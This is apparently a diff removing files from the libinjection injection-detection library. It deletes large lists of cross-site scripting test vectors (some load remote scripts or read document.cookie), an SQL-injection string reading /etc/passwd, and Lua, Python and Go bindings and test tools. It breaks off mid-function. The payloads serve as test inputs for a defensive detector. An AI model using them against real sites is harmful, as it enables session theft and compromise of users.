<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
|
||||
|
||||
# FRAME
|
||||
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
||||
|
||||
# TABLE
|
||||
<TABLE BACKGROUND="javascript:alert('XSS')">
|
||||
|
||||
# TD
|
||||
<TABLE BACKGROUND="javascript:alert('XSS')">
|
||||
|
||||
# DIV background-image
|
||||
<TABLE BACKGROUND="javascript:alert('XSS')">
|
||||
|
||||
# DIV background-image with unicoded XSS exploit
|
||||
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.
|
||||
|
||||
# DIV background-image plus extra characters
|
||||
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||
|
||||
# DIV expression
|
||||
<DIV STYLE="width: expression(alert('XSS'));">
|
||||
|
||||
|
||||
# "Downlevel-hidden block"
|
||||
<!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]-->
|
||||
|
||||
# BASE tag
|
||||
<BASE HREF="javascript:alert('XSS');//">
|
||||
|
||||
# Object tag
|
||||
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
||||
|
||||
# Using an EMBED tag you can embed a Flash movie that contains XSS
|
||||
<EMBED SRC="http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).:org/xss.swf" AllowScriptAccess="always"></EMBED>
|
||||
|
||||
# You can EMBED SVG which can contain your XSS vector
|
||||
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
|
||||
|
||||
# Using ActionScript inside flash can obfuscate your XSS vector
|
||||
# N/A
|
||||
|
||||
# XML data island with CDATA obfuscation
|
||||
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
|
||||
|
||||
# Locally hosted XML with embedded JavaScript that is generated using an XML data island
|
||||
<XML SRC="xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
||||
|
||||
# XSS using HTML quote encapsulatio
|
||||
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
|
||||
|
File diff suppressed because it is too large
|
@ -1,86 +0,0 @@
|
|||
#
|
||||
# Really simple XSS smoke test
|
||||
#
|
||||
|
||||
#
|
||||
# Script Tags
|
||||
#
|
||||
|
||||
# in plain text context - duh
|
||||
<script>alert(1);</script>
|
||||
|
||||
# as attribute <tag $USERINPUT></tag>
|
||||
><script>alert(1);</script>
|
||||
|
||||
# as unquoted value <tag foo=$USERINPUT></tag>
|
||||
x ><script>alert(1);</script>
|
||||
|
||||
# as single quoted value <tag foo='$USERINPUT'></tag>
|
||||
' ><script>alert(1);</script>
|
||||
|
||||
# as double quoted value <tag foo="$USERINPUT"></tag>
|
||||
"><script>alert(1);</script>
|
||||
|
||||
# inside <style>div:color=$USERINPUT;.. </style>
|
||||
red;</style><script>alert(1);</script>
|
||||
|
||||
# inside <style>div { color=$USERINPUT;..} </style>
|
||||
red;}</style><script>alert(1);</script>
|
||||
|
||||
# inside <div style="color:$USERINPUT"...
|
||||
red;"/><script>alert(1);</script>
|
||||
|
||||
# inside CSS URL, e.g. background-image:url('$USERINPUT')
|
||||
');}</style><script>alert(1);</script>
|
||||
|
||||
|
||||
#
|
||||
# onerror (or on-other)
|
||||
#
|
||||
|
||||
# as attribute <tag $USERINPUT></tag>
|
||||
onerror=alert(1)>
|
||||
|
||||
# as unquoted value <tag foo=$USERINPUT></tag>
|
||||
x onerror=alert(1);>
|
||||
|
||||
# as single quoted value <tag foo='$USERINPUT'></tag>
|
||||
x' onerror=alert(1);>
|
||||
|
||||
# as double quoted value <tag foo='$USERINPUT'></tag>
|
||||
x" onerror=alert(1);>
|
||||
|
||||
#
|
||||
# href-like
|
||||
#
|
||||
|
||||
# duh
|
||||
<a href="javascript:alert(1)">
|
||||
|
||||
<a href='javascript:alert(1)'>
|
||||
|
||||
<a href=javascript:alert(1)>
|
||||
|
||||
<a href = javascript:alert(1); >
|
||||
|
||||
<a href=" javascript:alert(1);" >
|
||||
|
||||
<a href="JAVASCRIPT:alert(1);" >
|
||||
|
||||
<a href=" javascript:alert(1)" >
|
||||
|
||||
<a href=" javascript:alert(1)" >
|
||||
|
||||
<a href=" javascript:alert(1)" >
|
||||
|
||||
# does not work
|
||||
#<a href=" javascript:alert(1)" >
|
||||
|
||||
<a href=" javascript:alert(1)" >
|
||||
|
||||
<a href="Javascript:alert(1)" >
|
||||
|
||||
<a href="Javascript:alert(1)" >
|
||||
|
||||
# really a raw embedded null
|
||||
<a href="j�avascript:alert(1)">
|
|
@ -1,105 +0,0 @@
|
|||
# http://slid.es/mscasharjaved/cross-site-scripting-my-love
|
||||
# http://pastebin.com/u6FY1xDA
|
||||
# @soaj1664ashar
|
||||
#
|
||||
1) <iframe %00 src="	javascript:prompt(1)	"%00>
|
||||
2) <svg><style>{font-family:'<iframe/onload=confirm(1)>'
|
||||
3) <input/onmouseover="javaSCRIPT:confirm(1)"
|
||||
4) <sVg><scRipt %00>alert(1) {Opera}
|
||||
5) <img/src=`%00` onerror=this.onerror=confirm(1)
|
||||
6) <form><isindex formaction="javascript:confirm(1)"
|
||||
7) <img src=`%00`
 onerror=alert(1)

|
||||
8) <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
|
||||
9) <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
|
||||
10) <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
|
||||
11) <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
|
||||
12) "><h1/onmouseover='\u0061lert(1)'>%00
|
||||
13) <iframe/src="data:text/html,<svg onload=alert(1)>">
|
||||
14) <meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
|
||||
15) <svg><script xlink:href=data:,window.open('https://www.google.com/')></script
|
||||
16) <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
|
||||
17) <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
|
||||
18) <iframe src=javascript:alert(document.location)>
|
||||
19) <form><a href="javascript:\u0061lert(1)">X
|
||||
20) </script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
|
||||
21) <img/	  src=`~` onerror=prompt(1)>
|
||||
22) <form><iframe 	  src="javascript:alert(1)" 	;>
|
||||
23) <a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
|
||||
24) http://www.google<script .com>alert(document.location)</script
|
||||
25) <a href=[�]"� onmouseover=prompt(1)//">XYZ</a
|
||||
26) <img/src=@  onerror = prompt('1')
|
||||
27) <style/onload=prompt('XSS')
|
||||
28) <script ^__^>alert(String.fromCharCode(49))</script ^__^
|
||||
29) </style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
|
||||
30) �</form><input type="date" onfocus="alert(1)">
|
||||
31) <form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
|
||||
32) <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
|
||||
33) <iframe srcdoc='<body onload=prompt(1)>'>
|
||||
34) <a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>
|
||||
35) <script ~~~>alert(0%250)</script ~~~>
|
||||
36) <style/onload=<!--	> alert (1)>
|
||||
37) <///style///><span %2F onmousemove='alert(1)'>SPAN
|
||||
38) <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
|
||||
39) "><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
|
||||
40) <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
|
||||
41) <marquee onstart='javascript:alert(1)'>^__^
|
||||
42) <div/style="width:expression(confirm(1))">X</div> {IE7}
|
||||
43) <iframe/%00/ src=javaSCRIPT:alert(1)
|
||||
44) //<form/action=javascript:alert(document.cookie)><input/type='submit'>//
|
||||
45) /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
|
||||
46) //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
|
||||
47) </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
|
||||
48) <a/href="javascript: javascript:prompt(1)"><input type="X">
|
||||
49) </plaintext\></|\><plaintext/onmouseover=prompt(1)
|
||||
50) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
|
||||
51) <a href="javascript:\u0061le%72t(1)"><button>
|
||||
52) <div onmouseover='alert(1)'>DIV</div>
|
||||
53) <iframe style="position:absolute;top:0;left:0;width:100%25;height:100%25" onmouseover="prompt(1)">
|
||||
54) <a href="jAvAsCrIpT:alert(1)">X</a>
|
||||
55) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
|
||||
56) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
|
||||
57) <var onmouseover="prompt(1)">On Mouse Over</var>
|
||||
58) <a href=javascript:alert(document.cookie)>Click Here</a>
|
||||
59) <img src="/" =_=" title="onerror='prompt(1)'">
|
||||
60) <%25<!--'%25><script>alert(1);</script -->
|
||||
61) <script src="data:text/javascript,alert(1)"></script>
|
||||
62) <iframe/src \/\/onload = prompt(1)
|
||||
63) <iframe/onreadystatechange=alert(1)
|
||||
64) <svg/onload=alert(1)
|
||||
65) <input value=<><iframe/src=javascript:confirm(1)
|
||||
66) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
|
||||
67) http://www.<script>alert(1)</script .com
|
||||
68) <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>
|
||||
69) <svg><script ?>alert(1)
|
||||
70) <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
|
||||
71) <img src=`xx:xx`onerror=alert(1)>
|
||||
72) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
|
||||
73) <meta http-equiv="refresh" content="0;javascript:alert(1)"/>
|
||||
74) <math><a xlink:href="//jsfiddle.net/t846h/">click
|
||||
75) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
|
||||
76) <svg contentScriptType=text/vbs><script>MsgBox+1
|
||||
77) <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
|
||||
78) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
|
||||
79) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
|
||||
80) <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
|
||||
81) <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
|
||||
82) <object data=javascript:\u0061le%72t(1)>
|
||||
83) <script>+-+-1-+-+alert(1)</script>
|
||||
84) <body/onload=<!-->
alert(1)>
|
||||
85) <script itworksinallbrowsers>/*<script* */alert(1)</script
|
||||
86) <img src ?itworksonchrome?\/onerror = alert(1)
|
||||
87) <svg><script>//
confirm(1);</script </svg>
|
||||
88) <svg><script onlypossibleinopera:-)> alert(1)
|
||||
89) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
|
||||
90) <script x> alert(1) </script 1=2
|
||||
91) <div/onmouseover='alert(1)'> style="x:">
|
||||
# unable to reproduce in IE8 or IE9
|
||||
#92) <--`<img/src=` onerror=alert(1)> --!>
|
||||
93) <script/src=data:text/javascript,alert(1)></script>
|
||||
94) <div style="position:absolute;top:0;left:0;width:100%25;height:100%25" onmouseover="prompt(1)" onclick="alert(1)">x</button>
|
||||
95) "><img src=x onerror=window.open('https://www.google.com/');>
|
||||
96) <form><button formaction=javascript:alert(1)>CLICKME
|
||||
97) <math><a xlink:href="//jsfiddle.net/t846h/">click
|
||||
98) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
|
||||
99) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
|
||||
100) <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
|
|
@ -1,57 +0,0 @@
|
|||
#
|
||||
# Misc XSS awesomeness from soaj1664ashar feed
|
||||
# https://twitter.com/soaj1664ashar
|
||||
#
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/424961050258063360
|
||||
# 2:46 AM - 20 Jan 2014
|
||||
<iframe/onload=action=/confir/.source+'m';eval(action)(1)>
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/418454103895728128
|
||||
# 3:50 AM - 2 Jan 2014
|
||||
<!--[if WindowsEdition]><script>confirm(location);</script><![endif]-->
|
||||
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/418163175788265472/
|
||||
# 8:34 AM - 1 Jan 2014 :-)
|
||||
><img src=http://i.imgur.com/ISxZ5dd.jpg onmouseover=confirm(/Happy_New_Year_2014/)>
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/416613093490163712
|
||||
# Dec 28, 2013
|
||||
# appears to be specific for a sanitization filter which alters the input
|
||||
# into an XSS-able form.
|
||||
#<form/action=ja	vascr	ipt:confirm(document.cookie)> <button/type=submit>
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/407438076118462464
|
||||
# 6:16 PM - 2 Dec 2013
|
||||
<style/onload = !-alert(1)>
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/407086397493747712
|
||||
# Dec 1, 2013
|
||||
<iframe/name="if(0){\u0061lert(1)}else{\u0061lert(1)}"/onload="eval(name)";>
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/400335443805237248
|
||||
# not sure who is author
|
||||
# FF specific bug
|
||||
# Nov 13, 2013
|
||||
<a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+" style="FONT-SIZE: 1000pt; FONT-FAMILY: Comic Sans MS; position:absolute;top:0;left:0;width:1000;height:1000;opacity:0">ClickMe</a>
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/400257634449637376
|
||||
<svg><;(noitacol)mrifnoc=daolno ;howthehellitworks`=wtf>`
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/400257634449637376
|
||||
# http://jsfiddle.net/DH8wM/10/
|
||||
<svg><GMO=`<ftw=`skrowtillehehtwoh; onload=confirm(location);
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/396307604734881792
|
||||
"><img src=x onerror=confirm(1);>
|
||||
#"><img src=x onerror=confirm(1);>
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/385461391366168576
|
||||
<img/src=x alt=confirm(1) onmouseover=eval(alt)>
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/367350377894518784
|
||||
# http://pastebin.com/TVH8t5bQ
|
||||
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(document.cookie)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id)>'"><img src="http://i.imgur.com/P8mL8.jpg">
|
||||
|
||||
# If a site has length restriction on input field then use chunk of your choice from the above vector :P
|
|
@ -1,33 +0,0 @@
|
|||
/*
|
||||
* Copyright (c) 2013 Radolsaw Wesolowski
|
||||
*
|
||||
* Permission to use, copy, modify, and distribute this software for any
|
||||
* purpose with or without fee is hereby granted, provided that the above
|
||||
* copyright notice and this permission notice appear in all copies.
|
||||
*
|
||||
*/
|
||||
|
||||
package main
|
||||
|
||||
/*
|
||||
#cgo CFLAGS: -I./libinjection
|
||||
#cgo LDFLAGS: -L./libinjection -linjection
|
||||
#include "libinjection.h"
|
||||
#include "libinjection_sqli.h"
|
||||
*/
|
||||
import "C"
|
||||
import (
|
||||
"bytes"
|
||||
"fmt"
|
||||
"unsafe"
|
||||
)
|
||||
|
||||
func main() {
|
||||
sqlinjection := "asdf asd ; -1' and 1=1 union/* foo */select load_file('/etc/passwd')--"
|
||||
var out [8]C.char
|
||||
pointer := (*C.char)(unsafe.Pointer(&out[0]))
|
||||
if found := C.libinjection_sqli(C.CString(sqlinjection), C.size_t(len(sqlinjection)), pointer); found == 1 {
|
||||
output := C.GoBytes(unsafe.Pointer(&out[0]), 8)
|
||||
fmt.Printf("sqli with fingerprint of '%s'\n", string(output[:bytes.Index(output, []byte{0})]))
|
||||
}
|
||||
}
|
|
@ -1 +0,0 @@
|
|||
lua-TestMore
|
|
@ -1,41 +0,0 @@
|
|||
#!/usr/bin/env python
|
||||
#
|
||||
# Copyright 2012, 2013 Nick Galbreath
|
||||
# nickg@client9.com
|
||||
# BSD License -- see COPYING.txt for details
|
||||
#
|
||||
|
||||
"""
|
||||
Converts a libinjection JSON data file to a C header (.h) file
|
||||
"""
|
||||
|
||||
def toc(obj):
|
||||
""" main routine """
|
||||
if False:
|
||||
print 'fingerprints = {'
|
||||
for fp in sorted(obj[u'fingerprints']):
|
||||
print "['{0}']='X',".format(fp)
|
||||
print '}'
|
||||
|
||||
words = {}
|
||||
keywords = obj['keywords']
|
||||
|
||||
for k,v in keywords.iteritems():
|
||||
words[str(k)] = str(v)
|
||||
|
||||
for fp in list(obj[u'fingerprints']):
|
||||
fp = '0' + fp.upper()
|
||||
words[str(fp)] = 'F';
|
||||
|
||||
print 'words = {'
|
||||
for k in sorted(words.keys()):
|
||||
#print "['{0}']='{1}',".format(k, words[k])
|
||||
print "['{0}']={1},".format(k, ord(words[k]))
|
||||
print '}'
|
||||
return 0
|
||||
|
||||
if __name__ == '__main__':
|
||||
import sys
|
||||
import json
|
||||
sys.exit(toc(json.load(sys.stdin)))
|
||||
|
|
@ -1,26 +0,0 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Generates a Lua table of fingerprints.
|
||||
One can then add, turn off or delete fingerprints from lua.
|
||||
"""
|
||||
|
||||
def make_lua_table(obj):
|
||||
"""
|
||||
Generates table. Fingerprints don't contain any special chars
|
||||
so they don't need to be escaped. The output may be
|
||||
sorted but it is not required.
|
||||
"""
|
||||
fp = obj[u'fingerprints']
|
||||
print("sqlifingerprints = {")
|
||||
for f in fp:
|
||||
print(' ["{0}"]=true,'.format(f))
|
||||
print("}")
|
||||
return 0
|
||||
|
||||
if __name__ == '__main__':
|
||||
import sys
|
||||
import json
|
||||
with open('../c/sqlparse_data.json', 'r') as fd:
|
||||
make_lua_table(json.load(fd))
|
||||
|
|
@ -1,62 +0,0 @@
|
|||
/* libinjection.i SWIG interface file */
|
||||
%module libinjection
|
||||
%{
|
||||
#include "libinjection.h"
|
||||
#include "libinjection_sqli.h"
|
||||
|
||||
static char libinjection_lua_lookup_word(sfilter* sf, int lookup_type,
|
||||
const char* s, size_t len)
|
||||
{
|
||||
lua_State* L = (lua_State*) sf->userdata;
|
||||
//char* luafunc = (char *)lua_tostring(L, 2);
|
||||
lua_getglobal(L, "lookup_word");
|
||||
SWIG_NewPointerObj(L, (void*)sf, SWIGTYPE_p_libinjection_sqli_state, 0);
|
||||
lua_pushnumber(L, lookup_type);
|
||||
lua_pushlstring(L, s, len);
|
||||
|
||||
if (lua_pcall(L, 3, 1, 0)) {
|
||||
printf("Something bad happened");
|
||||
}
|
||||
|
||||
const char* result = lua_tostring(L, -1);
|
||||
if (result == NULL) {
|
||||
return 0;
|
||||
} else {
|
||||
return result[0];
|
||||
}
|
||||
}
|
||||
%}
|
||||
%include "typemaps.i"
|
||||
|
||||
|
||||
// The C functions all start with 'libinjection_' as a namespace
|
||||
// We don't need this since it's in the libinjection table
|
||||
// i.e. libinjection.libinjection_is_sqli --> libinjection.is_sqli
|
||||
//
|
||||
%rename("%(strip:[libinjection_])s") "";
|
||||
|
||||
%typemap(in) (ptr_lookup_fn fn, void* userdata) {
|
||||
if (lua_isnil(L, 1)) {
|
||||
arg2 = NULL;
|
||||
arg3 = NULL;
|
||||
} else {
|
||||
arg2 = libinjection_lua_lookup_word;
|
||||
arg3 = (void *) L;
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
%typemap(out) stoken_t [ANY] {
|
||||
int i;
|
||||
lua_newtable(L);
|
||||
for (i = 0; i < $1_dim0; i++) {
|
||||
lua_pushnumber(L, i+1);
|
||||
SWIG_NewPointerObj(L, (void*)(& $1[i]), SWIGTYPE_p_stoken_t,0);
|
||||
lua_settable(L, -3);
|
||||
}
|
||||
SWIG_arg += 1;
|
||||
}
|
||||
|
||||
|
||||
%include "libinjection.h"
|
||||
%include "libinjection_sqli.h"
|
|
@ -1,107 +0,0 @@
|
|||
|
||||
require 'libinjection'
|
||||
|
||||
-- dofile('sqlifingerprints.lua')
|
||||
|
||||
-- silly callback that just calls back into C
|
||||
-- identical to libinjection_is_sqli(sql_state, string_input, nil)
|
||||
--
|
||||
function check_pattern_c(sqlstate)
|
||||
return(libinjection.sqli_blacklist(sqlstate) and
|
||||
libinjection.sqli_not_whitelist(sqlstate))
|
||||
end
|
||||
|
||||
-- half lua / half c checker
|
||||
-- use lua based fingerprint lookup and still uses C code
|
||||
-- to eliminate false positives
|
||||
function check_pattern(sqlstate)
|
||||
fp = sqlstate.pat
|
||||
if sqlifingerprints[fp] == true then
|
||||
-- try to eliminate certain false positives
|
||||
return(libinjection.sqli_not_whitelist(sqlstate))
|
||||
else
|
||||
-- not sqli
|
||||
return 0
|
||||
end
|
||||
end
|
||||
|
||||
function lookup_word(sqlstate, ltype, word)
|
||||
if ltype == 'X' then
|
||||
return words['0' .. word:upper()]
|
||||
else
|
||||
return words[word:upper()]
|
||||
end
|
||||
end
|
||||
|
||||
dofile('words.lua')
|
||||
|
||||
|
||||
-- THIS USES BUILT IN FINGERPRINTS
|
||||
-- (with last arg of 'nil')
|
||||
sqli = '1 union select * from table'
|
||||
|
||||
|
||||
sql_state = libinjection.sqli_state()
|
||||
libinjection.sqli_init(sql_state, sqli, sqli:len(), 0)
|
||||
|
||||
print(libinjection.is_sqli(sql_state))
|
||||
print(sql_state.pat)
|
||||
print('----')
|
||||
|
||||
|
||||
|
||||
inputs = {
|
||||
"123 LIKE -1234.5678E+2;",
|
||||
"APPLE 1 9.123 'FOO' \"BAR\"",
|
||||
"/* BAR */ UNION ALL SELECT (2,3,4)",
|
||||
"1 || COS(+0X04) --FOOBAR",
|
||||
"dog apple @cat banana bar",
|
||||
"dog apple cat \"banana \'bar",
|
||||
"102 TABLE CLOTH"
|
||||
}
|
||||
|
||||
function benchmark(imax)
|
||||
local x,s
|
||||
local t0 = os.clock()
|
||||
local sql_state = libinjection.sqli_state()
|
||||
for x = 0, imax do
|
||||
s = inputs[(x % 7) + 1]
|
||||
libinjection.sqli_init(sql_state, s, s:len(), 0)
|
||||
libinjection.is_sqli(sql_state)
|
||||
end
|
||||
local t1 = os.clock()
|
||||
print( imax / (t1-t0) )
|
||||
end
|
||||
|
||||
function benchmark_callback(imax)
|
||||
local x,s
|
||||
local t0 = os.clock()
|
||||
local sql_state = libinjection.sqli_state()
|
||||
for x = 0, imax do
|
||||
s = inputs[(x % 7) + 1]
|
||||
libinjection.sqli_init(sql_state, s, s:len(), 0)
|
||||
libinjection.sqli_callback(sql_state, 'lookup_word');
|
||||
libinjection.is_sqli(sql_state)
|
||||
end
|
||||
local t1 = os.clock()
|
||||
print( imax / (t1-t0) )
|
||||
end
|
||||
|
||||
benchmark(1000000)
|
||||
benchmark_callback(1000000)
|
||||
|
||||
-- THIS USES LUA FINGERPRINTS via 'check_pattern' function above
|
||||
|
||||
if 0 then
|
||||
for x = 1,2 do
|
||||
ok = libinjection.is_sqli(sql_state)
|
||||
if ok == 1 then
|
||||
print(sql_state.pat)
|
||||
vec = sql_state.tokenvec
|
||||
for i = 1, sql_state.pat:len() do
|
||||
print(vec[i].type, vec[i].val)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
@ -1,74 +0,0 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
import glob
|
||||
import sys
|
||||
|
||||
def readtestdata(filename):
|
||||
"""
|
||||
Read a test file and split into components
|
||||
"""
|
||||
|
||||
state = None
|
||||
info = {
|
||||
'--TEST--': '',
|
||||
'--INPUT--': '',
|
||||
'--EXPECTED--': ''
|
||||
}
|
||||
|
||||
for line in open(filename, 'r'):
|
||||
line = line.rstrip()
|
||||
if line in ('--TEST--', '--INPUT--', '--EXPECTED--'):
|
||||
state = line
|
||||
elif state:
|
||||
info[state] += line + '\n'
|
||||
|
||||
# remove last newline from input
|
||||
info['--INPUT--'] = info['--INPUT--'][0:-1]
|
||||
|
||||
return (info['--TEST--'], info['--INPUT--'].strip(), info['--EXPECTED--'].strip())
|
||||
|
||||
def luaescape(s):
|
||||
return s.strip().replace("\\", "\\\\").replace("\n", "\\n").replace("'", "\\'")
|
||||
|
||||
def genluatest(fname, data):
|
||||
# TBD: change to python os.path
|
||||
name = fname.split('/')[-1]
|
||||
if name.startswith('test-tokens-'):
|
||||
testname = 'test_tokens'
|
||||
extra = "\\n"
|
||||
elif name.startswith('test-tokens_mysql'):
|
||||
testname = 'test_tokens_mysql'
|
||||
extra = "\\n"
|
||||
elif name.startswith('test-folding-'):
|
||||
testname = 'test_folding'
|
||||
extra = "\\n"
|
||||
elif name.startswith('test-sqli-'):
|
||||
testname = 'test_fingerprints'
|
||||
extra = ''
|
||||
else:
|
||||
#print "IGNORING: " + name
|
||||
return
|
||||
|
||||
name = name.replace('.txt', '')
|
||||
|
||||
print "is({0}('{1}'),\n '{2}{3}',\n '{4}')\n".format(
|
||||
testname,
|
||||
luaescape(data[1]),
|
||||
extra,
|
||||
luaescape(data[2]),
|
||||
name
|
||||
)
|
||||
|
||||
def test2lua(fname):
|
||||
data = readtestdata(fname)
|
||||
genluatest(fname, data)
|
||||
|
||||
def main():
|
||||
print "require 'testdriver'\n"
|
||||
files = glob.glob('../tests/test-*.txt')
|
||||
print "plan({0})\n".format(len(files))
|
||||
for testfile in sorted(files):
|
||||
test2lua(testfile)
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
|
@ -1,90 +0,0 @@
|
|||
require 'libinjection'
|
||||
require 'Test.More'
|
||||
require 'Test.Builder.Tester'
|
||||
|
||||
function trim(s)
|
||||
return s:find'^%s*$' and '' or s:match'^%s*(.*%S)'
|
||||
end
|
||||
|
||||
function print_token_string(tok)
|
||||
local out = ''
|
||||
if tok.str_open ~= '\0' then
|
||||
out = out .. tok.str_open
|
||||
end
|
||||
out = out .. tok.val
|
||||
if tok.str_close ~= '\0' then
|
||||
out = out .. tok.str_close
|
||||
end
|
||||
return trim(out)
|
||||
end
|
||||
|
||||
function print_token(tok)
|
||||
local out = ''
|
||||
out = out .. tok.type
|
||||
out = out .. ' '
|
||||
if tok.type == 's' then
|
||||
out = out .. print_token_string(tok)
|
||||
elseif tok.type == 'v' then
|
||||
if tok.count == 1 then
|
||||
out = out .. '@'
|
||||
elseif tok.count == 2 then
|
||||
out = out .. '@@'
|
||||
end
|
||||
out = out .. print_token_string(tok)
|
||||
else
|
||||
out = out .. tok.val
|
||||
end
|
||||
return '\n' .. trim(out)
|
||||
end
|
||||
|
||||
function test_tokens(input)
|
||||
local out = ''
|
||||
local sql_state = libinjection.sqli_state()
|
||||
libinjection.sqli_init(sql_state, input, input:len(),
|
||||
libinjection.FLAG_QUOTE_NONE + libinjection.FLAG_SQL_ANSI)
|
||||
while (libinjection.sqli_tokenize(sql_state) == 1) do
|
||||
out = out .. print_token(sql_state.current)
|
||||
end
|
||||
return out
|
||||
end
|
||||
|
||||
function test_tokens_mysql(input)
|
||||
local out = ''
|
||||
local sql_state = libinjection.sqli_state()
|
||||
